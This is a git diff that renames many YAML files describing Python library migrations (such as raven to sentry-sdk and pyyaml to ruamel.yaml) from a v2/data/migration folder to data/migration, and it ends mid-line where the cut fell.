a/v2/data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml b/data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml rename to data/migration/pycryptodome__cryptography__tgalal@python-axolotl__f74a936.yaml diff --git a/v2/data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml b/data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml similarity index 100% rename from v2/data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml rename to data/migration/pycryptodome__cryptography__twisted@twisted__e31995c.yaml diff --git a/v2/data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml b/data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml similarity index 100% rename from v2/data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml rename to data/migration/pycryptodome__pycryptodomex__azure@aztk__19dde42.yaml diff --git a/v2/data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml b/data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml similarity index 100% rename from v2/data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml rename to data/migration/pycryptodome__pycryptodomex__malwaredllc@byob__9291b54.yaml diff --git a/v2/data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml b/data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml similarity index 100% rename from v2/data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml rename to data/migration/pycryptodome__pycryptodomex__snemes@malware-analysis__02b064b.yaml diff --git a/v2/data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml b/data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml similarity index 100% rename from v2/data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml rename to data/migration/pycurl__requests__tasmota@decode-config__5be6141.yaml diff --git a/v2/data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml b/data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml similarity index 100% rename from v2/data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml rename to data/migration/pycurl__requests__upstox@upstox-python__dce8760.yaml diff --git a/v2/data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml b/data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml similarity index 100% rename from v2/data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml rename to data/migration/pydotplus__pydot2__networkx@networkx__481f3e8.yaml diff --git a/v2/data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml b/data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml similarity index 100% rename from v2/data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml rename to data/migration/pydotplus__pydot2__trungdong@prov__acb9b05.yaml diff --git a/v2/data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml b/data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml similarity index 100% rename from v2/data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml rename to data/migration/pydotplus__pydot__mathics@mathics__915daeb.yaml diff --git a/v2/data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml b/data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml similarity index 100% rename from v2/data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml rename to data/migration/pyfits__astropy__glue-viz@glue__5b2d7f9.yaml diff --git a/v2/data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml b/data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml similarity index 100% rename from v2/data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml rename to data/migration/pyfits__astropy__icrar@ngas__fa8b714.yaml diff --git a/v2/data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml b/data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml similarity index 100% rename from v2/data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml rename to data/migration/pyfits__astropy__spacetelescope@pysynphot__5b80ada.yaml diff --git a/v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml b/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml similarity index 100% rename from v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml rename to data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__89c7afc.yaml diff --git a/v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml b/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml similarity index 100% rename from v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml rename to data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__a7f4c3f.yaml diff --git a/v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml b/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml similarity index 100% rename from v2/data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml rename to data/migration/pymilvus-orm__pymilvus__milvus-io@bootcamp__e5073e4.yaml diff --git a/v2/data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml b/data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml similarity index 100% rename from v2/data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml rename to data/migration/pyopenssl__cryptography__RIPE-NCC@ripe-atlas-sagan__f6fc10c.yaml diff --git a/v2/data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml b/data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml similarity index 100% rename from v2/data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml rename to data/migration/pyopenssl__cryptography__celery@celery__9b39fc4.yaml diff --git a/v2/data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml b/data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml similarity index 100% rename from v2/data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml rename to data/migration/pyopenssl__cryptography__openstack@neutron-lbaas__bb34d71.yaml diff --git a/v2/data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml b/data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml similarity index 100% rename from v2/data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml rename to data/migration/pypcap__pcapy__openstack@steth__a981d2e.yaml diff --git a/v2/data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml b/data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml similarity index 100% rename from v2/data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml rename to data/migration/pyqt5__pyside2__catalystneuro@nwb-conversion-tools__a2ef335.yaml diff --git a/v2/data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml b/data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml similarity index 100% rename from v2/data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml rename to data/migration/pyqt5__pyside2__sanpen@gridcal__39a5dd9.yaml diff --git a/v2/data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml b/data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml similarity index 100% rename from v2/data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml rename to data/migration/pyqt5__pyside6__toufool@auto-split__86244b6.yaml diff --git a/v2/data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml b/data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml similarity index 100% rename from v2/data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml rename to data/migration/pyquery__beautifulsoup4__idan@telostats__f73354a.yaml diff --git a/v2/data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml b/data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml similarity index 100% rename from v2/data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml rename to data/migration/pyside2__qtpy__pypeit@pypeit__ba5e21a.yaml diff --git a/v2/data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml b/data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml similarity index 100% rename from v2/data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml rename to data/migration/python-ldap__ldap3__cloud-custodian@cloud-custodian__cbaf252.yaml diff --git a/v2/data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml b/data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml similarity index 100% rename from v2/data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml rename to data/migration/python-ldap__ldap3__ictu@quality-time__cc47b42.yaml diff --git a/v2/data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml b/data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml similarity index 100% rename from v2/data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml rename to data/migration/python3-memcached__pymemcache__flan@staticdhcpd__0e64819.yaml diff --git a/v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml b/data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml similarity index 100% rename from v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml rename to data/migration/pytorch-pretrained-bert__pytorch-transformers__haoxizhong@pytorch-worker__fa8de77.yaml diff --git a/v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml b/data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml similarity index 100% rename from v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml rename to data/migration/pytorch-pretrained-bert__pytorch-transformers__kaushaltrivedi@fast-bert__1c96992.yaml diff --git a/v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml b/data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml similarity index 100% rename from v2/data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml rename to data/migration/pytorch-pretrained-bert__pytorch-transformers__naver@claf__cffe499.yaml diff --git a/v2/data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml b/data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml similarity index 100% rename from v2/data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml rename to data/migration/pytorch-pretrained-bert__transformers__tiiiger@bert_score__04376e1.yaml diff --git a/v2/data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml b/data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml similarity index 100% rename from v2/data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml rename to data/migration/pytorch-transformers__transformers__allenai@abductive-commonsense-reasoning__abfeffc.yaml diff --git a/v2/data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml b/data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml similarity index 100% rename from v2/data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml rename to data/migration/pytorch-transformers__transformers__calclavia@story-generation__8954fad.yaml diff --git a/v2/data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml b/data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml similarity index 100% rename from v2/data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml rename to data/migration/pytorch-transformers__transformers__huggingface@transfer-learning-conv-ai__16074b2.yaml diff --git a/v2/data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml b/data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml similarity index 100% rename from v2/data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml rename to data/migration/pytorch-transformers__transformers__intellabs@nlp-architect__9f067f2.yaml diff --git a/v2/data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml b/data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml similarity index 100% rename from v2/data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml rename to data/migration/pytorch-transformers__transformers__jsybrandt@agatha__b570ef0.yaml diff --git a/v2/data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml b/data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml similarity index 100% rename from v2/data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml rename to data/migration/pytorch-transformers__transformers__nvidia@nemo__7866512.yaml diff --git a/v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml b/data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml similarity index 100% rename from v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml rename to data/migration/pytz__pendulum__oddluck@limnoria-plugins__2c40713.yaml diff --git a/v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml b/data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml similarity index 100% rename from v2/data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml rename to data/migration/pytz__pendulum__oddluck@limnoria-plugins__33c7a3f.yaml diff --git a/v2/data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml b/data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml similarity index 100% rename from v2/data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml rename to data/migration/pyuserinput__pynput__activitywatch@aw-watcher-afk__297b58c.yaml diff --git a/v2/data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml b/data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml similarity index 100% rename from v2/data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml rename to data/migration/pyyaml__oyaml__cronyo@cronyo__edd0cc6.yaml diff --git a/v2/data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml b/data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml similarity index 100% rename from v2/data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml rename to data/migration/pyyaml__oyaml__gammapy@gammapy__848da63.yaml diff --git a/v2/data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml b/data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml similarity index 100% rename from v2/data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml rename to data/migration/pyyaml__ruamel.yaml__cloud-custodian@cloud-custodian__ee4d526.yaml diff --git a/v2/data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml b/data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml similarity index 100% rename from v2/data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml rename to data/migration/pyyaml__ruamel.yaml__common-workflow-language@cwltool__b9b65c0.yaml diff --git a/v2/data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml b/data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml similarity index 100% rename from v2/data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml rename to data/migration/pyyaml__ruamel.yaml__holgern@beem__f5ba90e.yaml diff --git a/v2/data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml b/data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml rename to data/migration/raven__sentry-sdk__agdsn@sipa__ea23791.yaml diff --git a/v2/data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml b/data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml rename to data/migration/raven__sentry-sdk__city-of-helsinki@respa__4fecb97.yaml diff --git a/v2/data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml b/data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml rename to data/migration/raven__sentry-sdk__etalab@udata__9bc0f73.yaml diff --git a/v2/data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml b/data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml rename to data/migration/raven__sentry-sdk__habitissimo@myaas__0a65bcc.yaml diff --git a/v2/data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml b/data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml rename to data/migration/raven__sentry-sdk__kiwicom@the-zoo__e22070c.yaml diff --git a/v2/data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml b/data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml rename to data/migration/raven__sentry-sdk__mozilla@addons-server__634c64f.yaml diff --git a/v2/data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml b/data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml rename to data/migration/raven__sentry-sdk__onecodex@onecodex__120d961.yaml diff --git a/v2/data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml b/data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml rename to data/migration/raven__sentry-sdk__pokainc@cfn-cross-region-export__f1120d3.yaml diff --git a/v2/data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml b/data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml rename to data/migration/raven__sentry-sdk__samuelcolvin@aiohttp-toolbox__3b7a2a3.yaml diff --git a/v2/data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml b/data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml rename to data/migration/raven__sentry-sdk__teamsempo@sempoblockchain__449990a.yaml diff --git a/v2/data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml b/data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml rename to data/migration/raven__sentry-sdk__thespaghettidetective@thespaghettidetective__b86b375.yaml diff --git a/v2/data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml b/data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml similarity index 100% rename from v2/data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml rename to data/migration/raven__sentry-sdk__weasyl@weasyl__d10cb16.yaml diff --git a/v2/data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml b/data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml similarity index 100% rename from v2/data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml rename to data/migration/redis__aioredis__walletconnect@py-walletconnect-bridge__c2d3db2.yaml diff --git a/v2/data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml b/data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml similarity index 100% rename from v2/data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml rename to data/migration/requests-oauth2__oauthlib__mozilla@addons-server__5fd17b4.yaml diff --git a/v2/data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml b/data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml similarity index 100% rename from v2/data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml rename to data/migration/requests-oauth2__requests-oauthlib__getsentry@sentry__0bfe540.yaml diff --git a/v2/data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml b/data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml similarity index 100% rename from v2/data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml rename to data/migration/requests-oauth2__requests-oauthlib__gunthercox@chatterbot__6c3b234.yaml diff --git a/v2/data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml b/data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml similarity index 100% rename from v2/data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml rename to data/migration/requests-oauth2__requests-oauthlib__sarumont@py-trello__ede0ceb.yaml diff --git a/v2/data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml b/data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml similarity index 100% rename from v2/data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml rename to data/migration/requests-oauth2__requests__sybrenstuvel@flickrapi__c4f8d79.yaml diff --git a/v2/data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml b/data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml rename to data/migration/requests__aiohttp__aiortc@aiortc__d30c240.yaml diff --git a/v2/data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml b/data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml rename to data/migration/requests__aiohttp__ictu@quality-time__d3a9a16.yaml diff --git a/v2/data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml b/data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml rename to data/migration/requests__aiohttp__keselekpermen69@userbutt__a2dd44e.yaml diff --git a/v2/data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml b/data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml rename to data/migration/requests__aiohttp__paradoxalarminterface@pai__fac6f80.yaml diff --git a/v2/data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml b/data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml rename to data/migration/requests__aiohttp__raptor123471@dingolingo__1d8923a.yaml diff --git a/v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml b/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml rename to data/migration/requests__aiohttp__talkpython@async-techniques-python-course__a5c04bb.yaml diff --git a/v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml b/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml rename to data/migration/requests__aiohttp__talkpython@async-techniques-python-course__ab4e5fd.yaml diff --git a/v2/data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml b/data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml similarity index 100% rename from v2/data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml rename to data/migration/requests__aiohttp__usergeteam@userge-plugins__80a5434.yaml diff --git a/v2/data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml b/data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml similarity index 100% rename from v2/data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml rename to data/migration/restkit__requests__sporteasy@python-poeditor__5710859.yaml diff --git a/v2/data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml b/data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml similarity index 100% rename from v2/data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml rename to data/migration/retrying__tenacity__intelai@inference-model-manager__71aff3a.yaml diff --git a/v2/data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml b/data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml similarity index 100% rename from v2/data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml rename to data/migration/retrying__tenacity__openstack@aodh__7587ab9.yaml diff --git a/v2/data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml b/data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml similarity index 100% rename from v2/data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml rename to data/migration/retrying__tenacity__openstack@ceilometer__380bb26.yaml diff --git a/v2/data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml b/data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml similarity index 100% rename from v2/data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml rename to data/migration/retrying__tenacity__openstack@ironic-inspector__f4648fa.yaml diff --git a/v2/data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml b/data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml similarity index 100% rename from v2/data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml rename to data/migration/retrying__tenacity__openstack@ironic__b0607a2.yaml diff --git a/v2/data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml b/data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml similarity index 100% rename from v2/data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml rename to data/migration/retrying__tenacity__pokainc@cfn-cross-region-export__8d0ec68.yaml diff --git a/v2/data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml b/data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml similarity index 100% rename from v2/data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml rename to data/migration/rpi.gpio__gpiozero__raspberrypilearning@push-button-stop-motion__0b6cdad.yaml diff --git a/v2/data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml b/data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml similarity index 100% rename from v2/data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml rename to data/migration/ruamel.yaml__pyyaml__cloud-custodian@cloud-custodian__12e3e80.yaml diff --git a/v2/data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml b/data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml similarity index 100% rename from v2/data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml rename to data/migration/ruamel.yaml__pyyaml__microsoft@nni__b955ac9.yaml diff --git a/v2/data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml b/data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml similarity index 100% rename from v2/data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml rename to data/migration/simplejson__ujson__covid-projections@covid-data-model__95385ff.yaml diff --git a/v2/data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml b/data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml similarity index 100% rename from v2/data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml rename to data/migration/simplejson__ujson__zulip@zulip__222ef67.yaml diff --git a/v2/data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml b/data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml similarity index 100% rename from v2/data/migration/slackclient__slack-sdk__alice-biometrics@petisco__9abf7b1.yaml rename to 